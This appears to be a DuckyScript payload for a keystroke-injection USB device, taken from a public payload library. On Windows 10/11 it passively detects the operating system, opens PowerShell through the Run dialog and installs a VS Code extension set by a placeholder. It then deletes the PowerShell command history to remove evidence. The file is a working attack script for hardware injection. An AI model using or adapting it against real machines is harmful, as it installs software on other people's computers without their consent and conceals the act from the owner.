Path: blob/master/payloads/library/execution/Install_Official_VSCode_Extension/payload.txt
2971 views
REM_BLOCK1#####################################################2# #3# Title : Install Official VSCode Extension #4# Author : Aleff #5# Version : 1.0 #6# Category : Execution #7# Target : Windows 10/11 #8# #9#####################################################10END_REM1112REM replace 'publisher.extensionName' with the publisher id and extension id, for istance 'Aleff.duckyscriptcookbook'13DEFINE #EXTENSION publisher.extensionName1415EXTENSION PASSIVE_WINDOWS_DETECT16REM VERSION 1.117REM AUTHOR: Korben1819REM_BLOCK DOCUMENTATION20Windows fully passive OS Detection and passive Detect Ready21Includes its own passive detect ready.22Does not require additional extensions.2324USAGE:25Extension runs inline (here)26Place at beginning of payload (besides ATTACKMODE) to act as dynamic27boot delay28$_OS will be set to WINDOWS or NOT_WINDOWS29See end of payload for usage within payload30END_REM3132REM CONFIGURATION:33DEFINE #MAX_WAIT 15034DEFINE #CHECK_INTERVAL 2035DEFINE #WINDOWS_HOST_REQUEST_COUNT 236DEFINE #NOT_WINDOWS 73738$_OS = #NOT_WINDOWS3940VAR $MAX_TRIES = #MAX_WAIT41WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))42DELAY #CHECK_INTERVAL43$MAX_TRIES = ($MAX_TRIES - 1)44END_WHILE45IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN46$_OS = WINDOWS47END_IF4849REM_BLOCK EXAMPLE USAGE AFTER EXTENSION50IF ($_OS == WINDOWS) THEN51STRING HELLO WINDOWS!52ELSE53STRING HELLO WORLD!54END_IF55END_REM56END_EXTENSION5758GUI r59DELAY 100060STRINGLN PowerShell61DELAY 10006263STRINGLN code --install-extension #EXTENSION; Remove-Item (Get-PSReadlineOption).HistorySavePath; exit646566